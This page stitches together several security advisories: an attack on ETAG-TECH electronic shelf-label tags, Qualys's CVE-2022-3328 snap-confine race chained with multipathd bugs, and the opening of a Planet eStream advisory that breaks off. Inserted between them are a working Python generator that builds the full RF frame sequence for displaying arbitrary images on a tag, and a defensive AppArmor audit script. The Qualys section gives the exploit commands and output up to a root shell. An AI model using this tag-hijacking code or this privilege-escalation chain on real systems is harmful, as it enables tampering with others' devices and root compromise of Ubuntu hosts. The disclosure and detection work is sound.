Thus,<br />any content can be displayed.<br /><br />The following steps are required:<br /> I) Send wake-up frames to the tag.<br /> II) Compress the picture that should be displayed.<br /> III) Wrap the compressed picture into the picture data structure.<br /> IV) Split the data structure into the image frames.<br /> V) Listen for the tag's response.<br /><br />I) The Wake-up Frame:<br />The CRC is calculated over the frame starting with the frame length<br />field. The frame counter counts down to zero. Every unique frame<br />(=unique frame counter) is sent five times. The frame is transmitted at<br />175 kBaud.<br /><br />| Preamble | Sync Header | Frame Length | Tag ID | Fixed Value | Frame Counter | Fixed Value | CRC16 |<br />|------------------|-------------|--------------|--------|-------------|---------------|-------------|-------|<br />| AAAAAAAAAAAAAAAA | D391D391 | 08 | 065302 | 0000 | 0398 | 0A | CRC |<br /><br /><br />II) The Compression Algorithm:<br />Run-length encoding is used as the compression algorithm. The image is read in<br />rows. An "a" stands for either 1 or 0, depending on whether the run being<br />encoded consists of ones or zeros. 
A "c" stands for the length of the<br />run.<br /><br />There are four different cases:<br /><br />Case 1: Less than 8 consecutive bits<br />0b1aaaaaaa<br />Case 2: Less than 32 consecutive bits<br />0b0acccccc<br />Case 3: Less than 256 consecutive bits<br />0b1a000000 0bcccccccc<br />Case 4: Less than 2^16 consecutive bits<br />0b0a000000 0bcccccccc 0bcccccccc<br /><br />III) The picture data structure<br />The compression header indicates the color channel:<br />FC00000000 = black<br />FC80000000 = red<br /><br />| LED | Batch Code | Fixed Value | LED Time | Compression header | Display Height | Display Width | Compressed Image Data |<br />|---------|------------|-------------|----------|--------------------|----------------|---------------|-------------------------|<br />| 0700 | BF75 | 00ED | 000A | FC00000000 | 007F | 0127 | <Compressed Image Data> |<br /><br />IV) The Image Frames<br />Image frames can only hold 54 Bytes of data. Thus the previously generated<br />image data structure is split into chunks of 54 bytes or less.<br />The CRC is calculated over the whole frame, starting with the frame length<br />field. The frame counter indicates frame 1 out of 9. 
The frame is transmitted<br />at 100 kBaud.<br /><br />| Preamble | Sync Header | Frame Length | Tag ID | Frame Counter | Fixed Value | Payload | CRC16 |<br />|------------------|-------------|--------------|--------|---------------|-------------|------------------------|-------|<br />| AAAAAAAAAAAAAAAA | D391D391 | 08 | 065302 | 0901 | 33 | <Image Data Structure> | CRC |<br /><br /><br />V) The Tag's Response<br />The frame is transmitted at 100 kBaud and repeated three times.<br /><br />| Preamble | Sync Header | Frame Length | Tag ID | Battery Voltage | RSSI | Temperature | CRC16 |<br />|------------------|-------------|--------------|--------|-----------------|-------------|-------------|-------|<br />| AAAAAAAAAAAAAAAA | D391D391 | 07 | 065302 | 1D = 2.9V | 2068 | E9 = 23.3C | CRC |<br /><br /><br />Following these steps, custom images can be sent over the ETAG-TECH protocol.<br />The only required information is the tag ID which is printed on the tag.<br />Otherwise it can be sniffed by listening to the RF interface and waiting for base<br />station communication. 
Thus, the tag can be fully controlled by an attacker.<br /><br />Videos of the attack have been published here:<br />* Displaying arbitrary tag contents: https://youtu.be/028Gn4VC8yE<br />* Receiving arbitrary ESL-TECH messages: https://youtu.be/x7t0QViu2gU<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />No version information could be identified for this product.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-08-14: Contacting vendor through info@zhsuny.com.cn and zhsuny@yeah.net<br /> No response.<br />2022-08-27: Contacting vendor through st@zhsuny.com.cn, no response.<br />2022-09-12: Contacting vendor again, communicating public release for October<br /> No response.<br />2022-12-01: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor did not respond to our communication attempts; there is no patch<br />available. In case you are using the product, contact the vendor and urge them<br />to fix the security vulnerabilities.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />EOF S. Robertz / @2022<br /><br /></code></pre>
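The frame layouts and the four RLE cases in the ETAG-TECH advisory above are enough to build a complete message generator, which is what the added example below does (it is not the advisory's or the vendor's code). Everything the advisory leaves open is an assumption and marked as such in the code: CRC-16/CCITT-FALSE for the CRC16 field (the polynomial is not given), big-endian multi-byte fields, the frame length field counting the bytes that follow it (as it does for the wake-up frame, 8, and the response frame, 7), the image frame counter as (total, index), and the "less than 8 consecutive bits" case carrying 7 literal pixels; a literal group whose low six bits are zero would be indistinguishable from case 3, so it is emitted as short case-2 runs instead. The decoder is included so the coder can be checked by round trip, and the response parser applies the 0.1 V / 0.1 C scaling the advisory's table implies (1D = 2.9 V, E9 = 23.3 C).

```python
import struct

PREAMBLE = bytes.fromhex("AAAAAAAAAAAAAAAA")
SYNC = bytes.fromhex("D391D391")
CHUNK = 54                          # payload bytes per image frame (from the advisory)

def crc16(data, poly=0x1021, init=0xFFFF):
    """CRC-16/CCITT-FALSE. ASSUMPTION: the advisory does not name the polynomial."""
    crc = init
    for b in data:
        crc ^= b << 8
        for _ in range(8):
            crc = ((crc << 1) ^ poly) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc

def build_frame(body):
    """Preamble + sync header + body + CRC16; the CRC covers the body, which
    starts with the frame length field, as the advisory states."""
    return PREAMBLE + SYNC + body + struct.pack(">H", crc16(body))

def wakeup_frames(tag_id, start):
    """Wake-up frames with the counter running from start down to zero; the
    caller transmits each frame five times at 175 kBaud."""
    return [build_frame(bytes([8]) + tag_id + b"\x00\x00" + struct.pack(">H", n) + b"\x0A")
            for n in range(start, -1, -1)]

def rle_encode(bits):
    """The four RLE cases. ASSUMPTIONS: case 1 carries 7 literal pixels, and a
    literal group whose low six bits are zero (it would read as case 3) is
    sent as short case-2 runs instead."""
    out, lit, i = bytearray(), [], 0

    def runs(seq):                               # case 2 for runs shorter than 32
        j = 0
        while j < len(seq):
            k = j
            while k < len(seq) and seq[k] == seq[j]:
                k += 1
            out.append((seq[j] << 6) | (k - j))
            j = k

    while i < len(bits):
        j = i
        while j < len(bits) and bits[j] == bits[i] and j - i < 0xFFFF:
            j += 1
        a, n = bits[i], j - i
        if n < 8:                                # gather into 7-pixel literal groups
            lit += bits[i:j]
            while len(lit) >= 7:
                group, lit = lit[:7], lit[7:]
                if any(group[1:]):
                    out.append(0x80 | int("".join(map(str, group)), 2))   # case 1
                else:
                    runs(group)
        else:
            runs(lit)
            lit = []
            if n < 32:
                out.append((a << 6) | n)                                  # case 2
            elif n < 256:
                out += bytes([0x80 | (a << 6), n])                        # case 3
            else:
                out += bytes([a << 6, n >> 8, n & 0xFF])                  # case 4
        i = j
    runs(lit)
    return bytes(out)

def rle_decode(data):
    bits, i = [], 0
    while i < len(data):
        b, i = data[i], i + 1
        a = (b >> 6) & 1
        if b & 0x80 and b & 0x3F:                # case 1: 7 literal pixels
            bits += [(b >> k) & 1 for k in range(6, -1, -1)]
        elif b & 0x80:                           # case 3: 8-bit run length
            bits += [a] * data[i]
            i += 1
        elif b & 0x3F:                           # case 2: 6-bit run length
            bits += [a] * (b & 0x3F)
        else:                                    # case 4: 16-bit run length
            bits += [a] * ((data[i] << 8) | data[i + 1])
            i += 2
    return bits

def picture_structure(width, height, bits, red=False):
    """LED | batch code | fixed | LED time | compression header | height | width | data."""
    hdr = bytes.fromhex("0700BF7500ED000A") + (b"\xFC\x80" if red else b"\xFC\x00") + b"\x00\x00\x00"
    return hdr + struct.pack(">HH", height, width) + rle_encode(bits)

def image_frames(tag_id, structure):
    """Split the structure into 54-byte chunks; counter = (total, index).
    ASSUMPTION: the length field counts the bytes after it."""
    chunks = [structure[k:k + CHUNK] for k in range(0, len(structure), CHUNK)]
    return [build_frame(bytes([6 + len(c)]) + tag_id + bytes([len(chunks), idx]) + b"\x33" + c)
            for idx, c in enumerate(chunks, 1)]

def parse_response(frame):
    """Tag response: 07 | tag ID | battery (0.1 V) | RSSI | temperature (0.1 C)."""
    body = frame[len(PREAMBLE) + len(SYNC):-2]
    if not frame.startswith(PREAMBLE + SYNC) or frame[-2:] != struct.pack(">H", crc16(body)):
        raise ValueError("bad sync header or CRC")
    return {"tag_id": body[1:4].hex(), "battery_v": body[4] / 10,
            "rssi": body[5:7].hex(), "temp_c": body[7] / 10}
```

With the tag ID printed on the label, `wakeup_frames()` followed by `image_frames(tag, picture_structure(w, h, pixels))` yields the complete byte sequence for step I to IV; only the 175/100 kBaud modulation and transmission (the HackRF side) is outside this block. If the real CRC differs from the assumed one, every other field stays valid and only `crc16()` needs to be swapped.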
<pre><code><br />Qualys Security Advisory<br /><br />Race condition in snap-confine's must_mkdir_and_open_with_perms()<br />(CVE-2022-3328)<br /><br /><br />========================================================================<br />Contents<br />========================================================================<br /><br />Summary<br />Background<br />Exploitation<br />Acknowledgments<br />Timeline<br /><br /> I can't help but feel a missed opportunity to integrate lyrics from<br /> one of the best songs ever: [SNAP! - The Power (Official Video)]<br /> -- https://twitter.com/spendergrsec/status/1494420041076461570<br /><br /><br />========================================================================<br />Summary<br />========================================================================<br /><br />We discovered a race condition (CVE-2022-3328) in snap-confine, a<br />SUID-root program installed by default on Ubuntu. In this advisory, we<br />tell the story of this vulnerability (which was introduced in February<br />2022 by the patch for CVE-2021-44731) and detail how we exploited it in<br />Ubuntu Server (a local privilege escalation, from any user to root) by<br />combining it with two vulnerabilities in multipathd (an authorization<br />bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):<br /><br />https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt<br /><br /><br />========================================================================<br />Background<br />========================================================================<br /><br /> Like the crack of the whip, I Snap! attack<br /> Radical mind, day and night all the time<br /> -- SNAP! 
- The Power<br /><br />In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory<br />(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):<br />to set up a snap's sandbox, snap-confine created the temporary directory<br />/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did<br />not belong to root; a local attacker could race against snap-confine,<br />retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full<br />root privileges.<br /><br />This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:<br />Prevent user-controlled race in setup_private_mount"), which introduced<br />a new helper function, must_mkdir_and_open_with_perms():<br /><br />------------------------------------------------------------------------<br />142 static void setup_private_mount(const char *snap_name)<br />...<br />169 sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);<br />...<br />176 base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);<br />------------------------------------------------------------------------<br /> 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,<br /> 56 mode_t mode)<br /> ..<br /> 61 mkdir:<br /> ..<br /> 67 if (mkdir(dir, 0700) < 0 && errno != EEXIST) {<br /> ..<br /> 70 fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);<br /> ..<br /> 81 if (fstat(fd, &st) < 0) {<br /> ..<br /> 84 if (st.st_uid != uid || st.st_gid != gid<br /> 85 || st.st_mode != (S_IFDIR | mode)) {<br />...<br />130 if (rename(dir, random_dir) < 0) {<br />...<br />135 goto mkdir;<br />------------------------------------------------------------------------<br /><br />- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if<br /> it does not exist already;<br /><br />- if it already exists, and if it does not belong to root (at line 84),<br /> then it is moved out of the way (at line 130) by rename()ing it to a<br 
/> random directory in /tmp, and its creation is retried (at line 135).<br /><br />When we reviewed this patch back in December 2021, we felt very nervous<br />about this rename() call (because it allows a local attacker to rename()<br />a directory they do not own), and we advised the Ubuntu Security Team to<br />either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create<br />it in a non-world-writable directory instead of /tmp, or at least to use<br />renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of<br />these ideas were deemed impractical (for example, renameat2() is not<br />supported by older kernel and glibc versions); moreover, we (Qualys)<br />failed to come up with a feasible attack plan against this rename()<br />call, so the patch was kept in its current form.<br /><br />After the release of Ubuntu 22.04 in April 2022, we decided to revisit<br />snap-confine and its recent hardening changes, and we finally found a<br />way to exploit the rename() call in must_mkdir_and_open_with_perms().<br /><br /><br />========================================================================<br />Exploitation<br />========================================================================<br /><br /> It's getting, it's getting, it's getting kinda heavy<br /> It's getting, it's getting, it's getting kinda hectic<br /> -- SNAP! 
- The Power<br /><br />The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:<br /><br />1/ snap-confine operates in /tmp to create a snap's temporary directory<br />(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in<br />/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in<br />sc_bootstrap_mount_namespace(), where all of the Xs are randomized by<br />mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap<br />instance name by sc_instance_name_validate() (when all of the Xs are<br />lowercase alphanumeric):<br /><br />------------------------------------------------------------------------<br />286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)<br />...<br />288 char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";<br />...<br />291 if (mkdtemp(scratch_dir) == NULL) {<br />...<br />303 sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);<br />...<br />319 sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,<br />...<br />331 for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;<br />...<br />342 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,<br />343 mnt->path);<br />...<br />352 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,<br />------------------------------------------------------------------------<br /><br />2/ We therefore execute two instances of snap-confine in parallel:<br /><br />- we block the first snap-confine immediately after it creates its root<br /> directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this<br /> race condition by "single-stepping" snap-confine, as explained in our<br /> "Lemmings" advisory);<br /><br />- we execute the second snap-confine with a snap instance name of<br /> rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of<br /> this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX<br /> of the first snap-confine;<br /><br />- we kill 
this second snap-confine immediately after it rename()s its<br /> temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory<br /> /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we<br /> reliably win this race condition with inotify, as explained in our<br /> "Lemmings" advisory);<br /><br />- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and<br /> resume the execution of the first snap-confine, whose root directory<br /> now belongs to us.<br /><br />3/ We can therefore create an arbitrary symlink<br />/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will<br />bind-mount the real /tmp directory (which is world-writable) onto any<br />directory in the filesystem (because mount() will follow our arbitrary<br />symlink at line 352).<br /><br />This ability will eventually allow us to obtain full root privileges,<br />but we must first solve three problems:<br /><br />------------------------------------------------------------------------<br />Problem a/ We cannot trick snap-confine into rename()ing<br />/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and<br />must_mkdir_and_open_with_perms() rename()s it only if it does not belong<br />to root!<br /><br />This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX<br />belongs to the user root, but it belongs to the group of our own user,<br />so must_mkdir_and_open_with_perms() rename()s it because it does not<br />belong to the group root (at line 84).<br /><br />------------------------------------------------------------------------<br />Problem b/ We cannot trick snap-confine into following our symlink<br />/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()<br />bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line<br />319): if we create our symlink before this bind-mount, then it becomes<br />covered by the squashfs; and we cannot create our symlink after this<br />bind-mount, because the 
squashfs is read-only and belongs to root!<br /><br />The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"<br />of our "Lemmings" advisory suggests a solution to this problem: we must<br />unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()<br />bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used<br />in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,<br />but we found a surprisingly simple workaround:<br /><br />we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately<br />after we re-create this directory ourselves; this allows us to unmount<br />(with fusermount -u -z) any subsequent bind-mounts (even if they belong<br />to root), because fusermount does not check that our FUSE filesystem is<br />indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.<br /><br />------------------------------------------------------------------------<br />Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp<br />onto an arbitrary directory in the filesystem (at line 352), because<br />such a bind-mount is forbidden by snap-confine's AppArmor profile!<br /><br />To solve this problem, we must bypass AppArmor completely, but the<br />technique we used in our "Lemmings" advisory (we wrapped snap-confine's<br />execution in an AppArmor profile that was in "complain" mode, not in<br />"enforce" mode) was patched in February 2022 (by commits 26eed65 and<br />4a2eb78, "ensure that snap-confine is in strict confinement" and<br />"Tighten AppArmor label check"):<br /><br />now, snap-confine's execution must be wrapped in an AppArmor profile<br />that is in "enforce" mode and whose label matches the regular expression<br />"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".<br /><br />We were about to give up on trying to exploit snap-confine, when we<br />discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is<br 
/>installed by default on Ubuntu Server): these two vulnerabilities allow<br />us to create a directory named "failed_wwids" (user root, group root,<br />mode 0700) anywhere in the filesystem, and we were able to transform<br />this very limited directory creation into a complete AppArmor bypass.<br /><br />AppArmor supports policy namespaces that are loosely related to kernel<br />user namespaces; by default, no AppArmor namespaces exist:<br /><br />------------------------------------------------------------------------<br />$ ls -la /sys/kernel/security/apparmor/policy/namespaces<br />total 0<br />drwxr-xr-x 2 root root 0 Aug 6 12:42 .<br />drwxr-xr-x 5 root root 0 Aug 6 12:42 ..<br />------------------------------------------------------------------------<br /><br />However, we (attackers) can create an AppArmor namespace "failed_wwids"<br />by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:<br /><br />------------------------------------------------------------------------<br />$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath<br /><br />$ multipathd list devices | grep 'whitelisted, unmonitored'<br /> sda1 devnode whitelisted, unmonitored<br /> ...<br /><br />$ multipathd list list path sda1<br />fail<br /><br />$ ls -la /sys/kernel/security/apparmor/policy/namespaces<br />total 0<br />drwxr-xr-x 3 root root 0 Aug 6 12:42 .<br />drwxr-xr-x 5 root root 0 Aug 6 12:42 ..<br />drwx------ 5 root root 0 Aug 6 13:38 failed_wwids<br />------------------------------------------------------------------------<br /><br />Then, we can enter this AppArmor namespace by creating and entering an<br />unprivileged user namespace:<br /><br />------------------------------------------------------------------------<br />$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh<br />------------------------------------------------------------------------<br /><br />Inside this namespace, we can create an AppArmor profile labeled<br 
/>"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all<br />possible operations:<br /><br />------------------------------------------------------------------------<br /># apparmor_parser -K -a << "EOF"<br />/usr/lib/snapd/snap-confine (enforce) {<br />capability,<br />network,<br />mount,<br />remount,<br />umount,<br />pivot_root,<br />ptrace,<br />signal,<br />dbus,<br />unix,<br />file,<br />change_profile,<br />}<br />EOF<br />------------------------------------------------------------------------<br /><br />Back in the initial namespace, we check that our "allow all" AppArmor<br />profile still exists:<br /><br />------------------------------------------------------------------------<br /># aa-status<br />apparmor module is loaded.<br />32 profiles are loaded.<br />32 profiles are in enforce mode.<br /> ...<br /> :failed_wwids:/usr/lib/snapd/snap-confine<br />------------------------------------------------------------------------<br /><br />Last, we make sure that snap-confine accepts our "allow all" AppArmor<br />profile (i.e., AppArmor is bypassed, and snap-confine is effectively<br />unconfined):<br /><br />------------------------------------------------------------------------<br />$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent<br />...<br />DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine<br />DEBUG: apparmor mode is: enforce<br />------------------------------------------------------------------------<br /><br />We can therefore bind-mount /tmp onto an arbitrary directory in the<br />filesystem (by exploiting CVE-2022-3328); since we already depend on<br />multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,<br />create our own shared library /lib/multipath/libchecktur.so, shutdown<br />multipathd (by exploiting CVE-2022-41974), restart multipathd (through<br />its Unix 
socket), and finally obtain full root privileges (because<br />multipathd executes our shared library as root when it restarts):<br /><br />------------------------------------------------------------------------<br />$ grep multipath /proc/self/mountinfo | wc<br /> 0 0 0<br /><br />$ gcc -o CVE-2022-3328 CVE-2022-3328.c<br />$ ./CVE-2022-3328<br />scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c<br /><br />$ grep multipath /proc/self/mountinfo<br />1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw<br />...<br /><br />$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c<br /><br />$ ps -ef | grep 'multipath[d]'<br />root 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s<br /><br />$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit<br />ok<br /><br />$ ps -ef | grep 'multipath[d]' | wc<br /> 0 0 0<br /><br />$ ls -l /tmp/sh<br />ls: cannot access '/tmp/sh': No such file or directory<br /><br />$ multipathd list daemon<br />error -104 receiving packet<br /><br />$ ls -l /tmp/sh<br />-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh<br /><br />$ /tmp/sh -p<br /># id<br />uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)<br /> ^^^^^^^^^^^^<br />------------------------------------------------------------------------<br /><br /><br />========================================================================<br />Acknowledgments<br />========================================================================<br /><br />We thank the Ubuntu security team (Alex Murray and Seth Arnold in<br />particular) and the snapd team for their hard work on this snap-confine<br />vulnerability. 
We also thank the members of linux-distros@openwall.<br /><br /><br />========================================================================<br />Timeline<br />========================================================================<br /><br />2022-08-23: Contacted security@ubuntu.<br /><br />2022-11-28: Contacted linux-distros@openwall.<br /><br />2022-11-30: Coordinated Release Date (17:00 UTC).<br /><br /></code></pre>
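The AppArmor bypass in the advisory above rests on two facts that a host check can look for: no AppArmor policy namespace exists on a default system, and a profile loaded inside a namespace appears in aa-status as ":<namespace>:<label>" while snap-confine only sees the unqualified label. The following script is an added example written for this page, not Qualys code: it lists policy namespaces under /sys/kernel/security/apparmor/policy/namespaces and flags namespaced profiles whose label satisfies the regular expression snap-confine enforces (quoted from the advisory). The aa-status text is a constructed sample shaped like the excerpt above.

```python
"""Audit AppArmor policy namespaces for profiles that impersonate snap-confine.

Added example (not Qualys code). Two checks from the advisory above:
(1) does any AppArmor policy namespace exist (none exist by default), and
(2) does a profile inside a namespace carry a label that passes
snap-confine's label check, e.g. ":failed_wwids:/usr/lib/snapd/snap-confine".
"""
import os
import re
from typing import List, Optional, Tuple

# Label regex that snap-confine enforces, quoted from the advisory.
SNAP_CONFINE_LABEL_RE = re.compile(
    r"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$"
)

# aa-status prints a profile loaded in a policy namespace as ":<namespace>:<profile>".
NAMESPACED_LABEL_RE = re.compile(r"^:([^:]+):(.+)$")

# sysfs directory listed in the advisory; empty on an untouched system.
POLICY_NAMESPACES_DIR = "/sys/kernel/security/apparmor/policy/namespaces"

# Constructed sample in the shape of the aa-status excerpt in the advisory.
SAMPLE_AA_STATUS = """\
apparmor module is loaded.
32 profiles are loaded.
32 profiles are in enforce mode.
   /usr/bin/man
   /usr/lib/snapd/snap-confine
   :failed_wwids:/usr/lib/snapd/snap-confine
0 profiles are in complain mode.
3 processes have profiles defined.
"""


def split_label(label: str) -> Tuple[Optional[str], str]:
    """Split ':ns:/path' into ('ns', '/path'); a plain label gets namespace None."""
    m = NAMESPACED_LABEL_RE.match(label)
    if m:
        return m.group(1), m.group(2)
    return None, label


def parse_aa_status(text: str) -> List[Tuple[str, str]]:
    """Return (mode, label) pairs from aa-status output.

    Profile lines are the indented lines that follow a
    'N profiles are in <mode> mode.' header; any other unindented line
    (process counts, banner) ends the current profile list.
    """
    mode = None
    profiles: List[Tuple[str, str]] = []
    for line in text.splitlines():
        header = re.match(r"^\d+ profiles are in (\w+) mode\.$", line)
        if header:
            mode = header.group(1)
            continue
        if line.startswith((" ", "\t")) and mode:
            profiles.append((mode, line.strip()))
        elif not line.startswith((" ", "\t")):
            mode = None
    return profiles


def find_impersonating_profiles(text: str) -> List[Tuple[str, str]]:
    """Namespaced profiles whose unqualified label would pass snap-confine's check."""
    hits = []
    for _mode, label in parse_aa_status(text):
        ns, profile = split_label(label)
        if ns is not None and SNAP_CONFINE_LABEL_RE.match(profile):
            hits.append((ns, profile))
    return hits


def list_policy_namespaces(path: str = POLICY_NAMESPACES_DIR) -> List[str]:
    """Names of AppArmor policy namespaces; [] when none exist or sysfs is absent."""
    try:
        return sorted(
            name for name in os.listdir(path)
            if os.path.isdir(os.path.join(path, name))
        )
    except OSError:
        return []


if __name__ == "__main__":
    for ns in list_policy_namespaces():
        print(f"unexpected AppArmor policy namespace: {ns}")
    for ns, profile in find_impersonating_profiles(SAMPLE_AA_STATUS):
        print(f"profile {profile} in namespace {ns} matches the snap-confine label")
```

On a live host, feed the real `aa-status` output to `find_impersonating_profiles()` instead of the sample; any policy namespace at all, or any namespaced profile matching the snap-confine label, is worth an alert on a system that was not configured to use AppArmor namespaces.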
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221130-0 ><br />=======================================================================<br /> title: Multiple critical vulnerabilities<br /> product: Planet Enterprises Ltd - Planet eStream<br /> vulnerable version: <6.72.10.07<br /> fixed version: 6.72.10.07<br /> CVE number: CVE-2022-45896, CVE-2022-45893, CVE-2022-45891,<br /> CVE-2022-45889, CVE-2022-45892, CVE-2022-45890,<br /> CVE-2022-45894, CVE-2022-45895<br /> impact: critical<br /> homepage: https://www.planetestream.co.uk<br /> found: 2022-09-01<br /> by: Timon Vogel (Office Vienna)<br /> Philipp Espernberger (Office Linz)<br /> Hrvoje Filakovic (Office Osijek)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Planet eStream is a powerfully simple and secure video platform,<br />making media more accessible and engaging for students and educators<br />across secondary, further, and higher education"<br /><br />Source: https://www.planetestream.co.uk<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an update for the affected version which should<br />be installed immediately.<br /><br />SEC Consult highly recommends performing a thorough security review of the<br />Planet eStream video streaming platform, conducted by security<br />professionals, to identify and resolve potential further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896)<br />The application allows users to upload files at multiple places.
It was<br />identified that it is possible to upload arbitrary malicious files without any<br />restriction and also without prior authentication! An attacker can upload<br />a webshell and take over the system.<br /><br /><br />2) Account Takeover (CVE-2022-45893)<br />A problem identified in the cookie and session management of the web application<br />allows users with low privileges to bypass the authentication and authorization<br />mechanisms. They can be bypassed by changing the value of the ON cookie. In this way,<br />users with low privileges can gain access to application features that are only accessible<br />to administrative and privileged users.<br /><br /><br />3) Broken Access Control (CVE-2022-45891)<br />Due to flaws in the authorization scheme, an authorization bypass vulnerability<br />allows an attacker to get access to restricted functions of the web application.<br />This can be leveraged to upload files to the web server without authentication<br />and gain access to restricted content that was uploaded by other users.<br /><br /><br />4) SQL Injection (CVE-2022-45889)<br />Due to insufficient input validation, the application allows the injection of<br />direct SQL commands. By exploiting the vulnerability, an attacker gains access<br />to all records stored in the database and can execute arbitrary SQL commands.<br /><br /><br />5) Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892)<br />User input is not properly sanitized or encoded in various places. This leads to<br />several stored cross-site scripting (XSS) vulnerabilities. By exploiting this<br />vulnerability, an attacker can persistently embed arbitrary HTML or JavaScript<br />code into the affected web page. The code is executed in the context of the<br />victim's browser when visiting the manipulated site.
Additionally, users are<br />potential victims of browser exploits and JavaScript trojans.<br /><br /><br />6) Reflected Cross-Site Scripting (XSS) (CVE-2022-45890)<br />One of the application scripts returns unfiltered or unescaped user input. This<br />leads to a reflected cross-site scripting (XSS) vulnerability. With reflected<br />cross-site scripting, an attacker can inject arbitrary HTML or JavaScript code<br />into the victim's web browser. Once the victim clicks a malicious link, the<br />attacker's code is executed in the context of the victim's web browser. The<br />vulnerability can be used to change the contents of the displayed site or<br />redirect to other malicious sites. Additionally, users are potential<br />victims of browser exploits and JavaScript trojans.<br /><br /><br />7) Path Traversal (CVE-2022-45894)<br />Attackers can gain access to files and directories outside the web root through<br />the use of relative file paths. In this case an authenticated<br />attacker with any role can inject "..\" sequences into a certain URL parameter<br />in order to navigate through the file system and access local files.<br /><br /><br />8) Information Disclosure (CVE-2022-45895)<br />Parts of the application were discovered that disclose sensitive data to<br />application users. While securely disclosing necessary information to authorized<br />users will normally not present a security threat, the identified components<br />disclose sensitive data that belongs to other users.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896)<br />Various file upload vulnerabilities were identified in the web application. The<br />following sections describe the vulnerabilities in detail.<br /><br />The file upload is restricted to certain file types in some cases. 
